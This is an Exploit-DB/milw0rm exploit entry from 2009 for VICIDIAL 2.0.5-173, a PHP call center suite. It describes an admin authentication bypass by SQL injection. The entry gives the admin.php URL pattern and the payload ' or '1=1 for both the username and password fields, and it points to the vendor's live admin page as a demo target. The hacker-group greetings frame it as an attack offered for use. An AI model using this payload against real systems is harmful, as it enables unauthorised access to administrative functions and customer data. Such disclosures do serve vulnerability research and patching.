VICIDIAL 2.0.5-173 - Authentication Bypass

EDB-ID:

8755


Author:

Striker7

Type:

webapps


Platform:

PHP

Date:

2009-05-21


#      _ _ _  _ _ _        _      _ _  _ _ _   _____
# _ _ |_   _| |  _ )  (_) | |__  |     |  _ )      /
#(_-<   | |   | |_//  | | | / /  |---> | |_//     /
#/__/   |_|   | |  \\ |_| |_\_\  |_ _  | |  \\   /
#########################################################################################################
[+] Type Exploit :VICIDIAL call center suite (Admin Bypass) SQL Injection Vulnerability
[+] Script Homepage :http://www.vicidial.org
[+] Discovered By Striker7
[+] Greate : His0k4 , Super Cristal , Yassine_enp , Dreadful ,Str0ke, And ALl Hacker Muslims(Dz)
[+] www.Snakespc.com
[+] Back To Hacker Of Nother Method
#########################################################################################################
 [+] Exploit(Ex):
  http://[Target].com/[path]/admin.php
   then >>
   Username:   ' or '1=1
   Password:   ' or '1=1
   [+]Live Demo:
   http://www.vicidial.org/vicidial/admin.php
#########################################################################################################

# milw0rm.com [2009-05-21]